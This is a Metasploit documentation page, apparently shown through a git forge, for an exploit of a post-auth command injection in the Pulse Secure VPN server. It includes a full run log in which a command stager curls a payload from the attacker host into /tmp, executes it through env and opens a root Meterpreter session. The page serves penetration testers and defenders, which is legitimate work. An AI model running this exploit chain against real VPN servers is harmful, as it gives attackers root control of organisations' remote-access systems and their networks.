adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2be37dda84d566397a3f85b0ab87a8f2b93c19e2
metasploit-gs/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md
T
h00die d8c73f6684 replace bold options with h3
2025-11-07 15:42:23 -05:00

3.2 KiB
Raw Blame History

Introduction

This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands.

Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit.

A valid administrator session ID is required in lieu of untested SSRF.

Targets

Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper

Options

SID

Set this to a valid administrator session ID. Typically retrieved using the auxiliary/gather/pulse_secure_file_disclosure module.

Usage

msf exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
sid => 676f5f892e8c4a6419f10564f9e9d857
msf exploit(linux/http/pulse_secure_cmd_exec) > run

[*] Started reverse TCP handler on 127.0.0.1:[redacted]
[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
[*] Obtaining CSRF token
[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
[*] Executing Linux Dropper target
[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
[*] Local IP: https://[redacted]:[redacted]/HSEjp77
[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
[+] Payload execution successful
[*] Command Stager progress -  63.96% done (71/111 bytes)
[*] Executing command: env chmod +x /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress -  87.39% done (97/111 bytes)
[*] Executing command: env /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
[!] Payload execution may have failed
[*] Command Stager progress - 102.70% done (114/111 bytes)
[*] Executing command: env rm -f /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 123.42% done (137/111 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : [redacted]
OS           :  (Linux 2.6.32-00486-gddd7e32-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink